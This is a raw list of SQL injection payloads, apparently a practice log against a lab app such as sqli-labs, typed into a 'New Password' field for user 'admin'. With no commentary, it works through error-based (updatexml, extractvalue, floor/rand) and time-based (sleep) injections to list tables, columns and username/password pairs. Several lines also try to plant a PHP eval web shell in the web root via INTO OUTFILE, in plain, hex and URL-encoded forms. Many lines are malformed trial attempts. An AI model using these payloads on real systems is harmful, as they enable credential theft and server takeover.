User Name:'admin'
New Password:1
User Name:'admin'
New Password:1'
User Name:'admin'
New Password:1' and 1=2;#
User Name:'admin'
New Password:1'and select concat(*) from information_schema.tables group by concat(database(),floor(rand(0)*2)) --+
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) #
User Name:'admin'
New Password:1' and if(1=1,sleep(10),1);#
User Name:'admin'
New Password:1' and if(1=2,sleep(10),1);#
User Name:'admin'
New Password:1' and if ((length(database()))>5,sleep(5),1);#
User Name:'admin'
New Password:1' and updataxml(group_concat(0x7e,(select database()),0x7e))));--+
User Name:'admin'
New Password:1' and updataxml(group_concat(0x7e,(select database()),0x7e))));#
User Name:'admin'
New Password:1' and updatexml(1,group_concat(0x7e,(select database()),0x7e));#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select database()),0x7e));#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select database()),0x7e));#
User Name:'admin'
New Password:1' and updatexml(concat(0x7e,(select database()),0x7e));#
User Name:'admin'
New Password:1' and updatexml(1,2,concat(0x7e,(select database()),0x7e));#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select database()),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,(concat(select database())),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select database()),0x7e)),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,select database(),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select database()),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,group_concat(select table_name from information_schema.tables where table_schema=database()),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,concat(select table_name from information_schema.tables where table_schema=database()),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(group_concat(select table_name from information_schema.tables where table_schema=database())),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,group_concat(0x7e,(select table_name from information_schema.tables where table_schema=database()),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' id>3),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users" && id>3),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users" & id>3),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' & id>3),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,select 1,"<?php @eval($_POST['cmd']);?>" into outfile 'D:\\phpstudy\\PHPTutorial\\WWW\\x.php'),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select "<?php @eval($_POST['cmd']);?>" into outfile 'D:\\phpstudy\\PHPTutorial\\WWW\\x.php'),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select "<?php @eval($_POST['cmd']);?>" into outfile 'D:\\phpstudy\\PHPTutorial\\WWW\\x.php'),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select  "<?php @eval($_POST['cmd']);?>"  into outfile 'D:\\phpstudy\\PHPTutorial\\WWW\\x.php'),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E into outfile 'D:\\phpstudy\\PHPTutorial\\WWW\\x.php'),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select <?php @eval($_POST['cmd']);?> into outfile 'D:\\phpstudy\\PHPTutorial\\WWW\\x.php'),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select <?php @eval($_POST['cmd']);?> into outfile D:\\phpstudy\\PHPTutorial\\WWW\\x.php),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select%20%22%3C?php%20@eval($_POST[%27cmd%27]);?%3E%22%20into%20outfile%20%27D:\\phpstudy\\PHPTutorial\\WWW\\x.php%27),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select%20%22%3C?php%20@eval($_POST[%27cmd%27]);?%3E%22%20into%20outfile%20%27D:\\phpstudy\\PHPTutorial\\WWW\\x.php%27),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' limit 2,5),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' limit 2,20),0x7e),1);#
User Name:'admin'
New Password:=123' AND (select 1 from (select count(*),(concat("~",database(),"~",floor(rand()*2)))name from information_schema.tables group by name)b) #
User Name:'admin'
New Password:=123' AND (select 1 from (select count(*),(concat("~",(select column_name from information_schema.columns where table_name='users' limit 0,1),"~",floor(rand()*2)))name from information_schema.tables group by name)b) #
User Name:'admin'
New Password:=123' AND (select 1 from (select count(*),(concat("~",(select group_concat(column_name) from information_schema.columns where table_name='users' limit 0,1),"~",floor(rand()*2)))name from information_schema.tables group by name)b) #
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1);#
User Name:'admin'
New Password:1‘
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1);#3
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,mid((select group_concat(column_name) from information_schema.columns where table_name='users'),32),0x7e),1);#3
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,mid((select group_concat(column_name) from information_schema.columns where table_name='users'),15),0x7e),1);#3
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,mid((select group_concat(column_name) from information_schema.columns where table_name='users'),30),0x7e),1);#3
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,mid((select group_concat(column_name) from information_schema.columns where table_name='users'),32),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,mid((select group_concat(username,";",password) from security.users)),0),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,mid((select group_concat(username,";",password) from security.users),0),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,mid((select group_concat(username,";",password) from security.user),0),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,mid((select group_concat(username,";",password) from security.users),0),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,mid((select group_concat(username,";",password) from users),0),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,mid((select group_concat(username,";",password) from security.users),0),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,mid((select group_concat(username,":",password) from security.users),0),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,mid((select group_concat(username) from security.users),0),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,mid((select group_concat(username) from security.users),1),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,mid((select group_concat(password) from security.users),1),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,(select group_concat(password) from security.users),0x7e),1);#
User Name:'admin'
New Password:1' and extractvalue(1,concat(0x7e,(select group_concat(password) from security.users),0x7e),1);#
User Name:'admin'
New Password:1' and extractvalue(1,concat(0x7e,(select group_concat(password) from security.users),0x7e));#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,mid((select group_concat(username,";",password) from security.users),0),0x7e),1);#
User Name:'admin'
New Password:1' and select concat(*) from information_schema.tables group by concat(mid((select group_concat(username,";",password) from security.users),0),floor(rand(0)*2))#
User Name:'admin'
New Password:1' and select group_concat(username,";",password) from security.users group by concat(database(),floor(rand(0)*2));#  and updatexml(1,concat(0x7e,mid((select group_concat(username,";",password) from security.users),0),0x7e),1);#
User Name:'admin'
New Password:1' and select concat(*) from information_schema.tables group by concat(username,";",password,floor(rand(0)*2));#  and updatexml(1,concat(0x7e,mid((select group_concat(username,";",password) from security.users),0),0x7e),1);#
User Name:'admin'
New Password:1' and select concat(*) from information_schema.tables group by concat(username,";",password),floor(rand(0)*2));#  and updatexml(1,concat(0x7e,mid((select group_concat(username,";",password) from security.users),0),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,mid((select group_concat(username,";",password) from security.users)),0),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,mid((select group_concat(username,";",password) from security.users),0),0x7e),1);#
User Name:'admin'
New Password:1' and updatexml(1,concat(0x7e,mid((select group_concat(username,";",password) ),0),0x7e),1);#
